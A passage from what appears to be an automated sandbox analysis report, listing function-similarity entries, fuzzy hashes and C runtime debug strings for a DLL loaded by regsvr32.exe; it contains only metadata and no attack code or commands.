                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: get_int64_arg
                                                  • String ID: '$0$9
                                                  • API String ID: 1967237116-269856862
                                                  • Opcode ID: 83c439eea7fc9ce93bcb821b911d608e7d80de2d13083439c5735137d4fc31ad
                                                  • Instruction ID: b3eda79bc04a60fb7ee4a4011f7c31915f3bf9e4e3688118cbdbb277fe6e384d
                                                  • Opcode Fuzzy Hash: 83c439eea7fc9ce93bcb821b911d608e7d80de2d13083439c5735137d4fc31ad
                                                  • Instruction Fuzzy Hash: 0D41B47260DAC187E7B58B19E8957AEB7E4F385791F100125EAC886B98DB7DE640CF00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Frame$CreateDestroyedExceptionFindInfoObjectUnlink
                                                  • String ID: csm
                                                  • API String ID: 2005287440-1018135373
                                                  • Opcode ID: 4c556ceed80f2aba1954f9041ed191ad0fbab56fa1f8ad9f2457e70616e7d401
                                                  • Instruction ID: 0432dbe60f42fc154ce83aeddd16286c3d94edaaa77ff7db33c77853d76fe5a2
                                                  • Opcode Fuzzy Hash: 4c556ceed80f2aba1954f9041ed191ad0fbab56fa1f8ad9f2457e70616e7d401
                                                  • Instruction Fuzzy Hash: FB51A836608B8682DAA09B1AF49076E77E0F3C4B91F615125EBCD47BB5DF3AD444CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: FileModuleName__initmbctable
                                                  • String ID: C:\Windows\System32\regsvr32.exe$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdargv.c
                                                  • API String ID: 3548084100-1254873407
                                                  • Opcode ID: d38f4fd9cb9ecdd73cd32345429acc70b773e7a180fa8c1b1693dc69edd9f2e5
                                                  • Instruction ID: 40487cdd99e7390fc7cfa00da240fffb72a0e4e16c6d4a8cb9187a6270b67cf4
                                                  • Opcode Fuzzy Hash: d38f4fd9cb9ecdd73cd32345429acc70b773e7a180fa8c1b1693dc69edd9f2e5
                                                  • Instruction Fuzzy Hash: 09410C21A19A8281EA90CB19EC8136E77A0F7857A5F614626E6EE43BF4DF3ED144C701
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: ("Buffer too small", 0)$_vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                  • API String ID: 2123368286-3717698799
                                                  • Opcode ID: 65def78894184635a726d36e54dfff1a0241531dd31d36ef72262bf6a1fca492
                                                  • Instruction ID: db9b60f6e9b20c9f37adeee518bf084cd0881f5c38580f5bd04c1ce4cfd39116
                                                  • Opcode Fuzzy Hash: 65def78894184635a726d36e54dfff1a0241531dd31d36ef72262bf6a1fca492
                                                  • Instruction Fuzzy Hash: 49412931E1C7868AEAB08B24E84476E62E0F385365F604335D6ED427E5CB3EE444CB11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: CountCriticalFileInitializeSectionSpinType_calloc_dbg_calloc_dbg_impl
                                                  • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.c
                                                  • API String ID: 2306298712-3864165772
                                                  • Opcode ID: 6db4822cd77f1ed37bef3fea8eb09d36478b9c501087b185a6ab49f69a42b384
                                                  • Instruction ID: b637de57708ed2c7d115ffe7a667dd769ed1fe34c6e506efeb830bf347bff847
                                                  • Opcode Fuzzy Hash: 6db4822cd77f1ed37bef3fea8eb09d36478b9c501087b185a6ab49f69a42b384
                                                  • Instruction Fuzzy Hash: D8313D32609BC585E7B08B19E84076EB3E1F385764F618225CAED877E4DB3DE405CB11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: _wcstombs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c
                                                  • API String ID: 2123368286-2562677240
                                                  • Opcode ID: dabd10d16ebe11174fc63b9f89b539a3b240949ad9ffb505f617c08bbd3ff20b
                                                  • Instruction ID: c85490607768c44f9eb9442c12c0ad7794bb5914cb74fa2bef1d73063ee62390
                                                  • Opcode Fuzzy Hash: dabd10d16ebe11174fc63b9f89b539a3b240949ad9ffb505f617c08bbd3ff20b
                                                  • Instruction Fuzzy Hash: 67311632A0DB8685EAB09B15E8407AEB7E1F385390F204625D6DD43BE8DB7ED444CB02
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter$__doserrno
                                                  • String ID: (str != NULL)$_fclose_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fclose.c
                                                  • API String ID: 1181141450-2845860089
                                                  • Opcode ID: 7bab6b588e6dd2839569b0ca5fa95970036134ebeeb6453b58b8f029525d0fe5
                                                  • Instruction ID: a2d3a4357c877c10dbeba88c1570b3bcf2b7b0db3c51835aaf51b50bd6ce4727
                                                  • Opcode Fuzzy Hash: 7bab6b588e6dd2839569b0ca5fa95970036134ebeeb6453b58b8f029525d0fe5
                                                  • Instruction Fuzzy Hash: 25316D36A28A4286E7909B19E88476E77E0F380794F205125F6CE477F5CB7ED841CF42
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: (fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_isatty$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\isatty.c
                                                  • API String ID: 2123368286-160817255
                                                  • Opcode ID: 20bce409a33f2d52ae5b3246709d5cabe66b407105c41d1953a7685d10f1773e
                                                  • Instruction ID: f81691e69628683e8e3df4f52d5e63bc79cedec177f2501b48199eede19b8a9f
                                                  • Opcode Fuzzy Hash: 20bce409a33f2d52ae5b3246709d5cabe66b407105c41d1953a7685d10f1773e
                                                  • Instruction Fuzzy Hash: 7E218E71B2D6428AE7D89B24EC8476DB3E1F390395F609635E1DE476E4D77ED4018B00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: (stream != NULL)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fclose.c$fclose
                                                  • API String ID: 2123368286-3409824857
                                                  • Opcode ID: b4902cc461c388e31b4dcd0307079e4da2555ab755984697fa072277fbec1f80
                                                  • Instruction ID: aea6e50ad225ee654e5ba897f2371f9ab8692fab447ee5272478533351973a17
                                                  • Opcode Fuzzy Hash: b4902cc461c388e31b4dcd0307079e4da2555ab755984697fa072277fbec1f80
                                                  • Instruction Fuzzy Hash: 69214C72A2D64286EB909F58E84476EB7E0F380394F605125E6CE47AE4CBBED444CF42
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale$UpdateUpdate::~_
                                                  • String ID: (unsigned)(c + 1) <= 256$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\isctype.c
                                                  • API String ID: 1901436342-3621827421
                                                  • Opcode ID: 582f87e7669c1111abee6c616077222c15a1b9b573b43815cbd7bd4630f6c99c
                                                  • Instruction ID: b6da7cfe51097e189ae1413993ad3b1820e6f9d9ec5e09c8ec6feaf0c9b902cc
                                                  • Opcode Fuzzy Hash: 582f87e7669c1111abee6c616077222c15a1b9b573b43815cbd7bd4630f6c99c
                                                  • Instruction Fuzzy Hash: 6D210132918A8186E790DB64E8516AEB7E0F7C4780F614122E7CD83AB9DB7DD954CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: ("Invalid error_mode", 0)$_set_error_mode$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\errmode.c
                                                  • API String ID: 2123368286-2972513288
                                                  • Opcode ID: f8745b700fb78b44b2e658b57c518d69726f466f5def5af1cc34e5c73236fe3e
                                                  • Instruction ID: 6381d33894c21e9a570bb340808ef8ba759c91e84b1c9252353dd9e19991e7ba
                                                  • Opcode Fuzzy Hash: f8745b700fb78b44b2e658b57c518d69726f466f5def5af1cc34e5c73236fe3e
                                                  • Instruction Fuzzy Hash: 64211A31E1D242CAE7E08F28EC44B6E72E1F344395F605536A6CA866B4D77EE944CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: _vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$string != NULL && sizeInBytes > 0
                                                  • API String ID: 2123368286-367560414
                                                  • Opcode ID: b10b6c40919f833f94f1f9af6a6d465dd1a232ebc9f5396bdae7492d99103452
                                                  • Instruction ID: a1605579a08129191013953cda15cb2ece86ed32ec4905bca1088ce11b277eda
                                                  • Opcode Fuzzy Hash: b10b6c40919f833f94f1f9af6a6d465dd1a232ebc9f5396bdae7492d99103452
                                                  • Instruction Fuzzy Hash: EB114931E0C64A89F7E08B14EC457BE62E0F750385F608525D2DD46AF9CBBEE4888F01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: _wcstombs_l_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c$pwcs != NULL
                                                  • API String ID: 2123368286-2992382544
                                                  • Opcode ID: 4e01e6c780b0bcb150885d639f6c4af62c750d2377cec983ef0e9e7992ea6864
                                                  • Instruction ID: 6b038216fd5801b421c61b74e1935d340daef546a177eff3ea16a7a1b838ed42
                                                  • Opcode Fuzzy Hash: 4e01e6c780b0bcb150885d639f6c4af62c750d2377cec983ef0e9e7992ea6864
                                                  • Instruction Fuzzy Hash: EE112831A08A86D5E7F08B24EC547BE62D0F388355FA0862581DD826E5CF7ED184CB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: (stream != NULL)$_fileno$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fileno.c
                                                  • API String ID: 2123368286-3532421942
                                                  • Opcode ID: 96c485b728b13626416908fd91ead62eaa4a9a456ff5e75182e25aa9e0b6060d
                                                  • Instruction ID: a908f33eec800d0b641dcce84a446a4f1bc570cb1104d1739574f535c1af449d
                                                  • Opcode Fuzzy Hash: 96c485b728b13626416908fd91ead62eaa4a9a456ff5e75182e25aa9e0b6060d
                                                  • Instruction Fuzzy Hash: 2D115771A2D6468AE7949B54E948B6E73E0F380344F605125F6DD43AA8C7BED508CB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: (dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0)$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c
                                                  • API String ID: 2123368286-152112980
                                                  • Opcode ID: 12ab011e70e09e91856032674ad216f6478f48f1fa811ad172dce2a736ade8bc
                                                  • Instruction ID: 92758ea50bb160a3fa02acdedbd4276cd578df270f1ec03c6948689f63d256e2
                                                  • Opcode Fuzzy Hash: 12ab011e70e09e91856032674ad216f6478f48f1fa811ad172dce2a736ade8bc
                                                  • Instruction Fuzzy Hash: B7110331A1CA83C9F7A09B54EC047AEB6E0F340345F604425D6C8466A4CBBEE8888B02
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _unlock$CurrentThreadValue_calloc_dbg_calloc_dbg_impl
                                                  • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dllcrt0.c
                                                  • API String ID: 433497747-929597301
                                                  • Opcode ID: 659d91e782a8862001f0c3efa2abcda19efd609cd314a8a22f2ba95e8e412daa
                                                  • Instruction ID: a509fa70e7a1a5ff7154c4a485401b757d9bccf253ee3a6eb315a1ba73516cba
                                                  • Opcode Fuzzy Hash: 659d91e782a8862001f0c3efa2abcda19efd609cd314a8a22f2ba95e8e412daa
                                                  • Instruction Fuzzy Hash: 25012D21A2C64282F3D09B65EC4473EA2E0F784B50F719275A9DE426F5CF3FE4018A01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: (count == 0) || (string != NULL)$_vsnprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                  • API String ID: 2123368286-3131718208
                                                  • Opcode ID: 6707a3a661624c28ef46bf525b659d524432ea2cd8b3632390f46d17d0644e77
                                                  • Instruction ID: 5c692777b4ebe1842fa8b4633668c7a74dcbf255a9000a4830a35d89f8dfec26
                                                  • Opcode Fuzzy Hash: 6707a3a661624c28ef46bf525b659d524432ea2cd8b3632390f46d17d0644e77
                                                  • Instruction Fuzzy Hash: 64113571E086469AF7A08B28ED047BE62E0F344708F608225A7EC076F5D77EE548CF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: (format != NULL)$_vsnprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                  • API String ID: 2123368286-1927795013
                                                  • Opcode ID: 1d868900bb9e5cb9c38cd3d3fc38e86365b4ebb9b902cb6620b71e05e16b40fa
                                                  • Instruction ID: 0384ac4a385dd8b2ed67f657b87bd2987707cc06f4fd1891b24df9f5e25f1ad6
                                                  • Opcode Fuzzy Hash: 1d868900bb9e5cb9c38cd3d3fc38e86365b4ebb9b902cb6620b71e05e16b40fa
                                                  • Instruction Fuzzy Hash: D7010832E0C646D6F7A08B68EC057AD66D0B380354F704225A69C066F9DB7EE585CB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: _msize_dbg$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$pUserData != NULL
                                                  • API String ID: 2123368286-563024394
                                                  • Opcode ID: 6b9fa116098faf353e1ca7c3b3c6506904e65b16bd6a9e65c326709190a7893b
                                                  • Instruction ID: fd38c362069ef75f6546e890191a2209ff1da2573c153e25103ddfba7490d183
                                                  • Opcode Fuzzy Hash: 6b9fa116098faf353e1ca7c3b3c6506904e65b16bd6a9e65c326709190a7893b
                                                  • Instruction Fuzzy Hash: EA011A3190964A86EBA09F14EC417AE32E0F355328FA14226D29C466E4DB7FE545CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter
                                                  • String ID: _vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$format != NULL
